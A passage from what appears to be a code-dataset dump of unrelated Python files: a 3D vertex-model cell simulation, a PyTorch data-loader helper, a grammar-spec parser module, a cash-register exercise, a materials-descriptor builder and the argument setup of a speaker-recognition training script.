area, extra = be_area([center,pts[i],pts[i-1]],[center,pts[i],pts[i-1]],pos)
magnitude = PI[index]*area[0]*(1/3)
direction = area[1]/np.linalg.norm(area[1])
force = magnitude*direction
force_dict[center] = np.add(force_dict[center],force)
force_dict[pts[i-1]] = np.add(force_dict[pts[i-1]],force)
force_dict[pts[i]] = np.add(force_dict[pts[i]],force)
# pressure for:
# basal nodes
area, extra = be_area([center+1000,pts[i-1]+1000,pts[i]+1000],[center+1000,pts[i-1]+1000,pts[i]+1000],pos)
magnitude = PI[index]*area[0]*(1/3)
direction = area[1]/np.linalg.norm(area[1])
force = magnitude*direction
force_dict[center+1000] = np.add(force_dict[center+1000],force)
force_dict[pts[i-1]+1000] = np.add(force_dict[pts[i-1]+1000],force)
force_dict[pts[i]+1000] = np.add(force_dict[pts[i]+1000],force)
# pressure for side panels
# loop through each cell
for index in range(0,len(circum_sorted)):
cell_nodes = circum_sorted[index]
centroid = np.array([pos[centers[index]], pos[centers[index]+1000]])
centroid = np.average(centroid, axis=0)
# loop through the 6 faces (or 5 or 7 after intercalation)
for i in range(0, len(cell_nodes)):
pts_id = np.array([cell_nodes[i-1], cell_nodes[i], cell_nodes[i]+1000, cell_nodes[i-1]+1000])
pts_pos = np.array([pos[pts_id[ii]] for ii in range(0,4)])
# on each face, calculate the center
center = np.average(pts_pos,axis=0)
# loop through the 4 triangles that make the face
for ii in range(0,4):
pos_side = [center, pts_pos[ii-1], pts_pos[ii]]
area = area_side(pos_side)
magnitude = PI[index]*area[0]*(1/2)
direction = area[1]/np.linalg.norm(area[1])
force = magnitude*direction
force_dict[pts_id[ii-1]] = np.add(force_dict[pts_id[ii-1]],force)
force_dict[pts_id[ii]] = np.add(force_dict[pts_id[ii]],force)
# Implement bending energy
# Loop through all alpha, beta pairs of triangles
for pair in triangles:
alpha, beta = pair[0], pair[1]
# Apical faces, calculate areas and cross-products
A_alpha, A_beta = be_area(alpha, beta, pos)
for node in alpha:
inda = alpha.index(node)
nbhrs_alpha = (alpha[(inda+1)%3], alpha[(inda-1)%3])
if node in beta:
indb = beta.index(node)
nbhrs_beta = (beta[(indb+1)%3], beta[(indb-1)%3])
frce = const.c_ab*bending_energy(nbhrs_alpha, nbhrs_beta, A_alpha, A_beta, pos)
else:
frce = const.c_ab*bending_energy(nbhrs_alpha, False, A_alpha, A_beta, pos)
force_dict[node] = np.add(force_dict[node],frce)
for node in beta:
# don't double count the shared nodes
indb = beta.index(node)
nbhrs_beta = (beta[(indb+1)%3], beta[(indb-1)%3])
if node not in alpha:
frce = const.c_ab*bending_energy(False, nbhrs_beta, A_alpha, A_beta, pos)
else:
frce = const.c_ab*np.array([0.,0.,0.])
force_dict[node] = np.add(force_dict[node],frce)
# Basal faces
alpha = [alpha[0]+1000, alpha[1]+1000, alpha[2]+1000]
beta = [beta[0]+1000, beta[1]+1000, beta[2]+1000]
A_alpha, A_beta = be_area(alpha, beta, pos)
for node in alpha:
inda = alpha.index(node)
nbhrs_alpha = (alpha[(inda+1)%3], alpha[(inda-1)%3])
if node in beta:
indb = beta.index(node)
nbhrs_beta = (beta[(indb+1)%3], beta[(indb-1)%3])
frce = const.c_ab*bending_energy(nbhrs_alpha, nbhrs_beta, A_alpha, A_beta, pos)
else:
frce = const.c_ab*bending_energy(nbhrs_alpha, False, A_alpha, A_beta, pos)
force_dict[node] = np.add(force_dict[node],frce)
for node in beta:
# don't double count the shared nodes
indb = beta.index(node)
nbhrs_beta = (beta[(indb+1)%3], beta[(indb-1)%3])
if node not in alpha:
frce = const.c_ab*bending_energy(False, nbhrs_beta, A_alpha, A_beta, pos)
else:
frce = np.array([0.,0.,0.])
force_dict[node] = np.add(force_dict[node],frce)
# update location of node
pos = nx.get_node_attributes(G,'pos')
for node in force_dict:
G.node[node]['pos'] = d_pos(pos[node],force_dict[node],dt)
## Check for intercalation events
pos = nx.get_node_attributes(G,'pos')
for node in range(0,num_api_nodes):
if node not in belt:
for neighbor in G.neighbors(node):
if (neighbor < 1000) and (neighbor not in belt) and (node not in centers) and (neighbor not in centers) and ([min(node, neighbor), max(node, neighbor)] not in blacklist):
a = pos[node]
b = pos[neighbor]
c = pos[node+1000]
d = pos[neighbor+1000]
dist = distance.euclidean(a,b)
if (dist < const.l_intercalation):
if (np.random.rand(1)[0] < 1.):
print("Intercalation event between nodes", node, "and", neighbor, "at t = ", t)
# collapse nodes to same position
# apical
avg_loc = (np.array(a) + np.array(b)) / 2.0
a = avg_loc
b = avg_loc
# basal
avg_loc = (np.array(c) + np.array(d)) / 2.0
c = avg_loc
d = avg_loc
# move nodes toward new center
# apical
cents = list(set(G.neighbors(node)) & set(G.neighbors(neighbor)))
mvmt = unit_vector(a,pos[cents[1]])
a = [a[0]+l_mvmt*mvmt[0], a[1]+l_mvmt*mvmt[1], a[2]+l_mvmt*mvmt[2]]
G.node[node]['pos'] = a
mvmt = unit_vector(b,pos[cents[0]])
b = [b[0]+l_mvmt*mvmt[0], b[1]+l_mvmt*mvmt[1], b[2]+l_mvmt*mvmt[2]]
G.node[neighbor]['pos'] = b
# basal
#cents = list(set(G.neighbors(node+1000)) & set(G.neighbors(neighbor+1000)))
mvmt = unit_vector(c,pos[cents[1]+1000])
c = [c[0]+l_mvmt*mvmt[0], c[1]+l_mvmt*mvmt[1], c[2]+l_mvmt*mvmt[2]]
G.node[node+1000]['pos'] = c
mvmt = unit_vector(d,pos[cents[0]+1000])
d = [d[0]+l_mvmt*mvmt[0], d[1]+l_mvmt*mvmt[1], d[2]+l_mvmt*mvmt[2]]
G.node[neighbor+1000]['pos'] = d
ii = list((set(list(G.neighbors(node))) & set(list(centers))) - (set(list(G.neighbors(node))) & set(list(G.neighbors(neighbor)))))[0]
jj = list((set(list(G.neighbors(neighbor))) & set(list(centers))) - (set(list(G.neighbors(node))) & set(list(G.neighbors(neighbor)))))[0]
temp1 = list(set(G.neighbors(node)) & set(G.neighbors(cents[0])))
temp1.remove(neighbor)
temp2 = list(set(G.neighbors(neighbor)) & set(G.neighbors(cents[1])))
temp2.remove(node)
# sever connections
# apical
G.remove_edge(node,cents[0])
G.remove_edge(node,temp1[0])
G.remove_edge(neighbor,cents[1])
G.remove_edge(neighbor,temp2[0])
# basal
G.remove_edge(node+1000,cents[0]+1000)
G.remove_edge(node+1000,temp1[0]+1000)
G.remove_edge(neighbor+1000,cents[1]+1000)
G.remove_edge(neighbor+1000,temp2[0]+1000)
# add new connections
# apical
# new edges
G.add_edge(node,temp2[0],l_rest = const.l_apical, myosin=0,color='#808080')
G.add_edge(neighbor,temp1[0],l_rest = const.l_apical, myosin=0,color='#808080')
# new spokes
G.add_edge(neighbor,ii,l_rest = const.l_apical, myosin=0)
G.add_edge(node,jj,l_rest = const.l_apical, myosin=0)
# basal
# new edges
G.add_edge(node+1000,temp2[0]+1000,l_rest = const.l_apical, myosin=0,color='#808080')
G.add_edge(neighbor+1000,temp1[0]+1000,l_rest = const.l_apical, myosin=0,color='#808080')
# new spokes
G.add_edge(neighbor+1000,ii+1000,l_rest = const.l_apical, myosin=0)
G.add_edge(node+1000,jj+1000,l_rest = const.l_apical, myosin=0)
# reset myosin on contracted edge
G[node][neighbor]['myosin'] = 0
G[node+1000][neighbor+1000]['myosin'] = 0
blacklist.append([min(node, neighbor), max(node, neighbor)])
circum_sorted, triangles, K = new_topology(K,[node, neighbor], cents, temp1, temp2, ii, jj, belt, centers, num_api_nodes)
if min(node,neighbor) == 301:
contract[0] = False
# #set dt for next loop
# if var_dt == True:
# if any(contract) == True:
# # if any edges are still contracting, check for threshold length
# for i in range(0,num_inter):
# # calculate lengths of those that are still True
# if contract[i] == True:
# a = inter_edges[i][0]
# b = inter_edges[i][1]
# if distance.euclidean(pos[a],pos[b]) < 0.2:
# dt = 0.1
# break
# else:
# if isclose(t % 1, 0) == False:
# dt = 0.1
# else:
# dt = const.dt
# var_dt = False
# else:
# dt = const.dt
# Save nx Graph in pickled form for plotting later
if t % 1 == 0:
file_name = 't' + str(round(t))
nx.write_gpickle(G,file_name + '.pickle')
np.save(file_name,circum_sorted)
| 43.444162 | 213 | 0.526903 | [
"MIT"
] | laurentmackay/3d-vertex | main_orig.py | 17,117 | Python |
from typing import Callable, Iterable
import torch
from torch.utils.data.dataloader import default_collate as default_collate_fn
from catalyst.data import ListDataset
def get_loader(
data_source: Iterable[dict],
open_fn: Callable,
dict_transform: Callable = None,
sampler=None,
collate_fn: Callable = default_collate_fn,
batch_size: int = 32,
num_workers: int = 4,
shuffle: bool = False,
drop_last: bool = False,
):
"""Creates a DataLoader from given source and its open/transform params.
Args:
data_source (Iterable[dict]): and iterable containing your
data annotations,
(for example path to images, labels, bboxes, etc)
open_fn (Callable): function, that can open your
annotations dict and
transfer it to data, needed by your network
(for example open image by path, or tokenize read string)
dict_transform (callable): transforms to use on dict
(for example normalize image, add blur, crop/resize/etc)
sampler (Sampler, optional): defines the strategy to draw samples from
the dataset
collate_fn (callable, optional): merges a list of samples to form a
mini-batch of Tensor(s). Used when using batched loading from a
map-style dataset
batch_size (int, optional): how many samples per batch to load
num_workers (int, optional): how many subprocesses to use for data
loading. ``0`` means that the data will be loaded
in the main process
shuffle (bool, optional): set to ``True`` to have the data reshuffled
at every epoch (default: ``False``).
drop_last (bool, optional): set to ``True`` to drop
the last incomplete batch, if the dataset size is not divisible
by the batch size. If ``False`` and the size of dataset
is not divisible by the batch size, then the last batch
will be smaller. (default: ``False``)
Returns:
DataLoader with ``catalyst.data.ListDataset``
"""
dataset = ListDataset(
list_data=data_source, open_fn=open_fn, dict_transform=dict_transform,
)
loader = torch.utils.data.DataLoader(
dataset=dataset,
sampler=sampler,
collate_fn=collate_fn,
batch_size=batch_size,
num_workers=num_workers,
shuffle=shuffle,
pin_memory=torch.cuda.is_available(),
drop_last=drop_last,
)
return loader
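# Illustrative usage sketch (`annotations` and `open_image` are hypothetical
# stand-ins for your own data source and open_fn, not part of this module):
#   loader = get_loader(
#       data_source=annotations,   # e.g. list of dicts with image paths/labels
#       open_fn=open_image,        # turns one dict into tensors for the model
#       batch_size=64,
#       shuffle=True,
#   )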
__all__ = ["get_loader"]
| 36.956522 | 78 | 0.652941 | [
"Apache-2.0"
] | Inkln/catalyst | catalyst/dl/utils/torch.py | 2,550 | Python |
"""
This module contains functionality for extracting a grammar from
classes in a module.
"""
from __future__ import annotations
import types
from parsing.interfaces import SpecSource
from parsing.grammar import (
PrecedenceSpec,
PrecedenceRef,
TokenSpec,
NontermSpec,
)
from parsing.ast import Token, Nonterm, Precedence
from parsing import introspection
from parsing.errors import SpecError
class ModuleSpecSource(SpecSource):
"""
ModuleSpecSource scans one or several modules for subclasses of relevant
classes (Precedence, Token, Nonterm) with specific docstrings.
"""
def __init__(
self, modules: types.ModuleType | list[types.ModuleType]
) -> None:
if isinstance(modules, types.ModuleType):
# Wrap single module in a list.
modules = [modules]
self.modules = modules
items = []
for module in self.modules:
for k, v in module.__dict__.items():
if isinstance(v, type) and isinstance(v.__doc__, str):
dirtoks = introspection.parse_docstring(v.__doc__)
items.append((module, k, v, dirtoks))
self.named_objs = items
self._cache_precedences: list[PrecedenceSpec] | None = None
self._cache_tokens: list[TokenSpec] | None = None
self._cache_nonterminals: tuple[
list[NontermSpec], NontermSpec
] | None = None
def get_precedences(self) -> list[PrecedenceSpec]:
if self._cache_precedences is not None:
return self._cache_precedences
result = []
for module, k, v, dirtoks in self.named_objs:
if issubclass(v, Precedence) and dirtoks[0] in [
"%fail",
"%nonassoc",
"%left",
"%right",
"%split",
]:
name = k
relationships = {}
i = 1
while i < len(dirtoks):
tok = dirtoks[i]
m = PrecedenceSpec.assoc_tok_re.match(tok)
if m:
# Precedence relationship.
if m.group(2) in relationships:
raise SpecError(
"Duplicate precedence "
"relationship: %s" % v.__doc__
)
relationships[m.group(2)] = m.group(1)
else:
m = NontermSpec.token_re.match(tok)
if m:
if i != 1:
raise SpecError(
"Precedence name must come before "
"relationships: %s" % v.__doc__
)
name = m.group(1)
else:
raise SpecError(
"Invalid precedence specification: %s"
% v.__doc__
)
i += 1
prec = PrecedenceSpec(name, dirtoks[0][1:], relationships)
result.append(prec)
self._cache_precedences = result
return result
def get_tokens(self) -> list[TokenSpec]:
if self._cache_tokens is not None:
return self._cache_tokens
result = []
for module, k, v, dirtoks in self.named_objs:
if issubclass(v, Token) and dirtoks[0] in ["%token"]:
name = k
prec = None
i = 1
while i < len(dirtoks):
tok = dirtoks[i]
m = NontermSpec.precedence_tok_re.match(tok)
if m:
if i < len(dirtoks) - 1:
raise SpecError(
"Precedence must come last in token "
"specification: %s" % v.__doc__
)
prec = PrecedenceRef(m.group(1))
else:
m = NontermSpec.token_re.match(tok)
if m:
name = m.group(1)
else:
raise SpecError(
"Invalid token specification: %s" % v.__doc__
)
i += 1
if prec is None:
prec = PrecedenceRef("none")
token = TokenSpec(v, name, prec)
result.append(token)
self._cache_tokens = result
return result
def get_nonterminals(self) -> tuple[list[NontermSpec], NontermSpec]:
if self._cache_nonterminals is not None:
return self._cache_nonterminals
result = []
startSym: NontermSpec | None = None
for module, k, v, dirtoks in self.named_objs:
if issubclass(v, Nonterm) and dirtoks[0] in ["%start", "%nonterm"]:
nonterm, is_start = NontermSpec.from_class(v)
result.append(nonterm)
if is_start:
# Start symbol.
if startSym is not None:
raise SpecError(
"Only one start non-terminal allowed: %s"
% v.__doc__
)
startSym = nonterm
assert startSym is not None
self._cache_nonterminals = (result, startSym)
return result, startSym
| 37.973154 | 79 | 0.470308 | [
"MIT"
] | MagicStack/parsing | parsing/module_spec.py | 5,658 | Python |
# cash register
class RetailItem:
def __init__(self, description, units_in_inventory, price):
self.__description = description
self.__units_in_inventory = units_in_inventory
self.__price = price
def get_description(self):
return self.__description
def get_units_in_inventory(self):
return self.__units_in_inventory
def get_price(self):
return self.__price
def set_description(self, description):
self.__description = description
def set_units_in_inventory(self, units_in_inventory):
self.__units_in_inventory = units_in_inventory
def set_price(self, price):
self.__price = price
def __str__(self):
return self.__description + ", " + \
"items: " + str(self.__units_in_inventory) + ", " + \
"$ " + str(float(self.__price)) + ". "
class CashRegister:
all_items_in_cart = []
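    # NOTE: all_items_in_cart is a class-level attribute, so every
    # CashRegister instance shares the same cart; main() below relies on
    # this by creating fresh CashRegister() objects for each operation.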
def purchase_item(self, retail_item):
return self.all_items_in_cart.append(retail_item)
def get_total(self):
total = 0
for item in self.all_items_in_cart:
total += RetailItem.get_price(item) * \
RetailItem.get_units_in_inventory(item)
return total
def get_num_items(self):
num_items = 0
for item in self.all_items_in_cart:
num_items += RetailItem.get_units_in_inventory(item)
return num_items
def show_items(self):
if not self.all_items_in_cart:
print("Your Cart is empty.")
print("Your Cart:")
for item in self.all_items_in_cart:
print(item)
def clear(self):
self.all_items_in_cart.clear()
def main():
more = "y"
while more == "y":
# if you want to manually enter object parameters manually
# enter the instance attribute values
print("If you want to manually enter object parameters\n"
"manually enter the instance attribute values.")
print("Enter yours item.")
more_item = "y"
while more_item == "y":
description = input("description: ")
units_in_inventory = int(input("count of item: "))
price = float(input("price: "))
items = RetailItem(description, units_in_inventory, price)
CashRegister().purchase_item(items)
more_item = input("More item yes -'y', no -'any ch'.")
if more_item == "y":
continue
ready = input("Ready to pay? yes 'y', no 'any ch'")
if ready == "y":
print()
# show all item in basket
CashRegister().show_items()
# Showing the customer the number of selected products
print("Numbers of items:", CashRegister().get_num_items())
# returns the total cost of all RetailItem objects
# stored in the object's internal list 'all_items_in_cart'
print("Total = $",
'{:.2f}'.format(CashRegister().get_total()))
print()
print("Enter 'y' if you pay, no 'any ch'.")
print("Enter 'c' if you want clean cart.")
pay = input("Enter: ")
if pay == "y":
print("Paid.")
print("Product sent.")
# clears the internal list 'all_items_in_cart' of the
# CashRegister object. After payment, we clear the shopping
# cart, that is, the internal list 'all_items_in_cart'
print("Shopping cart empty.", CashRegister().clear())
break
if pay == "c":
# clears the internal list 'all_items_in_cart' of the
# CashRegister object. After payment, we clear the shopping
# cart, that is, the internal list 'all_items_in_cart'
print("we clear the shopping cart",
CashRegister().clear())
else:
print("The product remained in cart.")
more = input("Add more products? yes 'y', no 'any ch'")
main()
| 33.752 | 79 | 0.560796 | [
"MIT"
] | SergeHall/Tony-Gaddis-Python-4th | chapter_10/08_cash_register.py | 4,219 | Python |
from itertools import chain
from typing import Iterator, Mapping, Union, List
from uuid import UUID
from gemd.entity.link_by_uid import LinkByUID
from gemd.entity.bounds import RealBounds, CategoricalBounds, MolecularStructureBounds, \
IntegerBounds, CompositionBounds
from gemd.entity.template.attribute_template import AttributeTemplate
from gemd.entity.template.has_property_templates import HasPropertyTemplates
from gemd.entity.template.has_condition_templates import HasConditionTemplates
from gemd.entity.template.has_parameter_templates import HasParameterTemplates
from gemd.entity.value import EmpiricalFormula
from gemd.util import recursive_flatmap, set_uuids
from citrine.builders.auto_configure import AutoConfigureMode
from citrine.informatics.descriptors import RealDescriptor, CategoricalDescriptor, \
MolecularStructureDescriptor, Descriptor, ChemicalFormulaDescriptor
from citrine.resources.data_concepts import DataConceptsCollection
from citrine.resources.material_run import MaterialRun
from citrine.resources.project import Project
class NoEquivalentDescriptorError(ValueError):
"""Error that is raised when the bounds in a template have no equivalent descriptor."""
pass
def template_to_descriptor(template: AttributeTemplate, *,
headers: List[str] = []) -> Descriptor:
"""
Convert a GEMD attribute template into an AI Engine Descriptor.
IntBounds cannot be converted because they have no matching descriptor type.
CompositionBounds can only be converted when every component is an element, in which case
they are converted to ChemicalFormulaDescriptors.
Parameters
----------
template: AttributeTemplate
Template to convert into a descriptor
headers: List[str]
Names of parent relationships to includes as prefixes
to the template name in the descriptor key
Default: []
Returns
-------
Descriptor
Descriptor with a key matching the template name and type corresponding to the bounds
"""
headers = headers + [template.name]
descriptor_key = '~'.join(headers)
bounds = template.bounds
if isinstance(bounds, RealBounds):
return RealDescriptor(
key=descriptor_key,
lower_bound=bounds.lower_bound,
upper_bound=bounds.upper_bound,
units=bounds.default_units
)
if isinstance(bounds, CategoricalBounds):
return CategoricalDescriptor(
key=descriptor_key,
categories=bounds.categories
)
if isinstance(bounds, MolecularStructureBounds):
return MolecularStructureDescriptor(
key=descriptor_key
)
if isinstance(bounds, CompositionBounds):
if set(bounds.components).issubset(EmpiricalFormula.all_elements()):
return ChemicalFormulaDescriptor(
key=descriptor_key
)
else:
msg = "Cannot create descriptor for CompositionBounds with non-atomic components"
raise NoEquivalentDescriptorError(msg)
if isinstance(bounds, IntegerBounds):
raise NoEquivalentDescriptorError("Cannot create a descriptor for integer-valued data")
raise ValueError("Template has unrecognized bounds: {}".format(type(bounds)))
class PlatformVocabulary(Mapping[str, Descriptor]):
"""
Dictionary of descriptors that define a controlled vocabulary for the AI Engine.
Parameters
----------
entries: Mapping[str, Descriptor]
Entries in the dictionary, indexed by a convenient name.
To build from templates, use PlatformVocabulary.from_templates
To build from a material, use PlatformVocabulary.from_material
"""
def __init__(self, *, entries: Mapping[str, Descriptor]):
self._entries = entries
def __getitem__(self, k: str) -> Descriptor:
return self._entries[k]
def __len__(self):
return len(self._entries)
def __iter__(self) -> Iterator[str]:
return iter(self._entries)
@staticmethod
def from_templates(*, project: Project, scope: str):
"""
Build a PlatformVocabulary from the templates visible to a project.
All of the templates with the given scope are downloaded and converted into descriptors.
The uid values associated with that scope are used as the index into the dictionary.
For example, using scope "my_templates" with a template with
uids={"my_templates": "density"} would be indexed into the dictionary as "density".
Parameters
----------
project: Project
Project on the Citrine Platform to read templates from
scope: str
Unique ID scope from which to pull the template names
Returns
-------
PlatformVocabulary
"""
def _from_collection(collection: DataConceptsCollection):
return {x.uids[scope]: x for x in collection.list() if scope in x.uids}
properties = _from_collection(project.property_templates)
parameters = _from_collection(project.parameter_templates)
conditions = _from_collection(project.condition_templates)
res = {}
for k, v in chain(properties.items(), parameters.items(), conditions.items()):
try:
desc = template_to_descriptor(v)
res[k] = desc
except NoEquivalentDescriptorError:
continue
return PlatformVocabulary(entries=res)
@staticmethod
def from_material(
*,
project: Project,
material: Union[str, UUID, LinkByUID, MaterialRun],
mode: AutoConfigureMode = AutoConfigureMode.PLAIN,
full_history: bool = True
):
"""[ALPHA] Build a PlatformVocabulary from templates appearing in a material history.
All of the attribute templates that appear throughout the material's history
are extracted and converted into descriptors.
Descriptor keys are formatted according to the option set by mode.
For example, if a condition template with name 'Condition 1'
appears in a parent process with name 'Parent',
the mode option produces the following descriptor key:
mode = AutoConfigMode.PLAIN --> 'Parent~Condition 1'
mode = AutoConfigMode.FORMULATION --> 'Condition 1'
Parameters
----------
project: Project
Project to use when accessing the Citrine Platform.
material: Union[str, UUID, LinkByUID, MaterialRun]
A representation of the material to extract descriptors from.
mode: AutoConfigureMode
Formatting option for descriptor keys in the platform vocabulary.
Option AutoConfigMode.PLAIN includes headers from the parent object,
whereas option AutoConfigMode.FORMULATION does not.
Default: AutoConfigureMode.PLAIN
full_history: bool
Whether to extract descriptors from the full material history,
or only the provided (terminal) material.
Default: True
Returns
-------
PlatformVocabulary
"""
if not isinstance(mode, AutoConfigureMode):
raise TypeError('mode must be an option from AutoConfigureMode')
# Full history not needed when full_history = False
# But is convenient to populate templates for terminal material
history = project.material_runs.get_history(id=material)
if full_history:
search_history = recursive_flatmap(history, lambda x: [x], unidirectional=False)
set_uuids(search_history, 'id')
else:
# Limit the search to contain the terminal material/process/measurements
search_history = [history.spec.template, history.process.template]
search_history.extend([msr.template for msr in history.measurements])
search_history = [x for x in search_history if x is not None] # Edge case safety
# Extract templates and formatted keys
res = {}
for obj in search_history:
# Extract all templates
templates = []
if isinstance(obj, HasPropertyTemplates):
for property in obj.properties:
templates.append(property[0])
if isinstance(obj, HasConditionTemplates):
for condition in obj.conditions:
templates.append(condition[0])
if isinstance(obj, HasParameterTemplates):
for parameter in obj.parameters:
templates.append(parameter[0])
# Assemble to descriptors
headers = []
if mode == AutoConfigureMode.PLAIN:
headers.append(obj.name)
for tmpl in templates:
try:
desc = template_to_descriptor(tmpl, headers=headers)
res[desc.key] = desc
except NoEquivalentDescriptorError:
continue
return PlatformVocabulary(entries=res)
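# Minimal usage sketch, assuming a `project` handle obtained from the Citrine SDK
# (the scope name and the "density" key mirror the docstring examples above):
#
#     vocab = PlatformVocabulary.from_templates(project=project, scope="my_templates")
#     density = vocab["density"]            # Descriptor built from the matching template
#     for name, descriptor in vocab.items():
#         print(name, descriptor)
#
# PlatformVocabulary.from_material works the same way, but harvests attribute
# templates from a material history instead of the project's template collections.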
| 39.111111 | 96 | 0.668706 | [
"Apache-2.0"
] | CitrineInformatics/citrine-python | src/citrine/builders/descriptors.py | 9,152 | Python |
#!/usr/bin/env python
# encoding: utf-8
"""
@Author: yangwenhao
@Contact: [email protected]
@Software: PyCharm
@File: train_lores10_kaldi.py
@Time: 2020/4/4 11:14 AM
@Overview:
"""
from __future__ import print_function
import argparse
import os
import os.path as osp
import sys
import time
# Version conflict
import warnings
import numpy as np
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torchvision.transforms as transforms
from kaldi_io import read_mat, read_vec_flt
from tensorboardX import SummaryWriter
from torch.autograd import Variable
from torch.optim.lr_scheduler import MultiStepLR, ExponentialLR
from tqdm import tqdm
from Define_Model.LossFunction import CenterLoss
from Define_Model.SoftmaxLoss import AngleSoftmaxLoss, AngleLinear, AdditiveMarginLinear, AMSoftmaxLoss
from Define_Model.model import PairwiseDistance
from Process_Data import constants as c
from Process_Data.KaldiDataset import ScriptTestDataset, KaldiExtractDataset, \
ScriptVerifyDataset
from Process_Data.LmdbDataset import EgsDataset
from Process_Data.audio_processing import concateinputfromMFB, to2tensor, varLengthFeat, ConcateVarInput
from Process_Data.audio_processing import toMFB, totensor, truncatedinput, read_audio
from TrainAndTest.common_func import create_optimizer, create_model, verification_test, verification_extract
from eval_metrics import evaluate_kaldi_eer, evaluate_kaldi_mindcf
from logger import NewLogger
warnings.filterwarnings("ignore")
import torch._utils
try:
torch._utils._rebuild_tensor_v2
except AttributeError:
def _rebuild_tensor_v2(storage, storage_offset, size, stride, requires_grad, backward_hooks):
tensor = torch._utils._rebuild_tensor(storage, storage_offset, size, stride)
tensor.requires_grad = requires_grad
tensor._backward_hooks = backward_hooks
return tensor
torch._utils._rebuild_tensor_v2 = _rebuild_tensor_v2
# Training settings
parser = argparse.ArgumentParser(description='PyTorch Speaker Recognition')
# Data options
parser.add_argument('--train-dir', type=str, help='path to dataset')
parser.add_argument('--valid-dir', type=str, help='path to dataset')
parser.add_argument('--test-dir', type=str, help='path to voxceleb1 test dataset')
parser.add_argument('--trials', type=str, default='trials', help='trials filename')
parser.add_argument('--domain', action='store_true', default=False, help='set domain in dataset')
parser.add_argument('--nj', default=12, type=int, metavar='NJOB', help='num of job')
parser.add_argument('--feat-format', type=str, default='kaldi', choices=['kaldi', 'npy'],
help='number of jobs to make feats (default: 10)')
parser.add_argument('--check-path', default='Data/checkpoint/LoResNet10/spect/soft',
help='folder to output model checkpoints')
parser.add_argument('--save-init', action='store_true', default=True, help='need to make mfb file')
parser.add_argument('--resume',
default='Data/checkpoint/LoResNet10/spect/soft/checkpoint_10.pth', type=str,
metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('--start-epoch', default=1, type=int, metavar='N',
help='manual epoch number (useful on restarts)')
parser.add_argument('--epochs', type=int, default=20, metavar='E',
help='number of epochs to train (default: 10)')
parser.add_argument('--scheduler', default='multi', type=str,
metavar='SCH', help='The optimizer to use (default: Adagrad)')
parser.add_argument('--gamma', default=0.75, type=float,
metavar='GAMMA', help='The optimizer to use (default: Adagrad)')
parser.add_argument('--milestones', default='10,15', type=str,
metavar='MIL', help='The optimizer to use (default: Adagrad)')
parser.add_argument('--min-softmax-epoch', type=int, default=40, metavar='MINEPOCH',
                    help='minimum epoch for initial parameter using softmax (default: 40)')
parser.add_argument('--veri-pairs', type=int, default=12800, metavar='VP',
                    help='number of verification pairs to sample (default: 12800)')
# Training options
# Model options
parser.add_argument('--model', type=str, help='path to voxceleb1 test dataset')
parser.add_argument('--resnet-size', default=8, type=int,
metavar='RES', help='The channels of convs layers)')
parser.add_argument('--inst-norm', action='store_true', default=False,
help='replace batchnorm with instance norm')
parser.add_argument('--channels', default='64,128,256', type=str,
metavar='CHA', help='The channels of convs layers)')
parser.add_argument('--feat-dim', default=161, type=int, metavar='FEAT',
help='acoustic feature dimension')
parser.add_argument('--remove-vad', action='store_true', default=False,
help='using Cosine similarity')
parser.add_argument('--alpha', default=12, type=float, metavar='FEAT',
help='acoustic feature dimension')
parser.add_argument('--kernel-size', default='5,5', type=str, metavar='KE',
help='kernel size of conv filters')
parser.add_argument('--cos-sim', action='store_true', default=True,
help='using Cosine similarity')
parser.add_argument('--avg-size', type=int, default=4, metavar='ES',
help='Dimensionality of the embedding')
parser.add_argument('--embedding-size-a', type=int, default=128, metavar='ES',
help='Dimensionality of the embedding')
parser.add_argument('--embedding-size-b', type=int, default=64, metavar='ES',
help='Dimensionality of the embedding')
parser.add_argument('--embedding-size-o', type=int, default=32, metavar='ES',
help='Dimensionality of the embedding')
parser.add_argument('--batch-size', type=int, default=128, metavar='BS',
help='input batch size for training (default: 128)')
parser.add_argument('--input-per-spks', type=int, default=224, metavar='IPFT',
help='input sample per file for testing (default: 8)')
parser.add_argument('--num-valid', type=int, default=5, metavar='IPFT',
help='input sample per file for testing (default: 8)')
parser.add_argument('--test-input-per-file', type=int, default=4, metavar='IPFT',
help='input sample per file for testing (default: 8)')
parser.add_argument('--test-batch-size', type=int, default=1, metavar='BST',
help='input batch size for testing (default: 64)')
parser.add_argument('--dropout-p', type=float, default=0., metavar='BST',
help='input batch size for testing (default: 64)')
# loss configure
parser.add_argument('--loss-type', type=str, default='soft', choices=['soft', 'asoft', 'center', 'amsoft'],
help='path to voxceleb1 test dataset')
parser.add_argument('--finetune', action='store_true', default=False,
help='using Cosine similarity')
parser.add_argument('--loss-ratio', type=float, default=0.1, metavar='LOSSRATIO',
                    help='weight of the auxiliary (center) loss term (default: 0.1)')
parser.add_argument('--dom-ratio', type=float, default=0.1, metavar='DOMAINLOSSRATIO',
                    help='weight of the domain classification loss (default: 0.1)')
parser.add_argument('--sim-ratio', type=float, default=0.1, metavar='DOMAINLOSSRATIO',
                    help='weight of the speaker/domain embedding similarity penalty (default: 0.1)')
# args for additive margin-softmax
parser.add_argument('--margin', type=float, default=0.3, metavar='MARGIN',
                    help='the margin value for the additive margin softmax loss function (default: 0.3)')
parser.add_argument('--s', type=float, default=15, metavar='S',
                    help='the scale value for the additive margin softmax loss function (default: 15)')
# args for a-softmax
parser.add_argument('--m', type=int, default=3, metavar='M',
                    help='the margin value for the angular softmax loss function (default: 3)')
parser.add_argument('--lambda-min', type=int, default=5, metavar='S',
                    help='minimum annealing lambda for the angular softmax loss (default: 5)')
parser.add_argument('--lambda-max', type=float, default=1000, metavar='S',
                    help='maximum annealing lambda for the angular softmax loss (default: 1000)')
parser.add_argument('--lr', type=float, default=0.1, metavar='LR', help='learning rate (default: 0.125)')
parser.add_argument('--lr-decay', default=0, type=float, metavar='LRD',
help='learning rate decay ratio (default: 1e-4')
parser.add_argument('--weight-decay', default=5e-4, type=float,
metavar='WEI', help='weight decay (default: 0.0)')
parser.add_argument('--momentum', default=0.9, type=float,
metavar='MOM', help='momentum for sgd (default: 0.9)')
parser.add_argument('--dampening', default=0, type=float,
metavar='DAM', help='dampening for sgd (default: 0.0)')
parser.add_argument('--optimizer', default='sgd', type=str,
metavar='OPT', help='The optimizer to use (default: Adagrad)')
# Device options
parser.add_argument('--no-cuda', action='store_true', default=False,
help='enables CUDA training')
parser.add_argument('--gpu-id', default='1', type=str,
help='id(s) for CUDA_VISIBLE_DEVICES')
parser.add_argument('--seed', type=int, default=123456, metavar='S',
help='random seed (default: 0)')
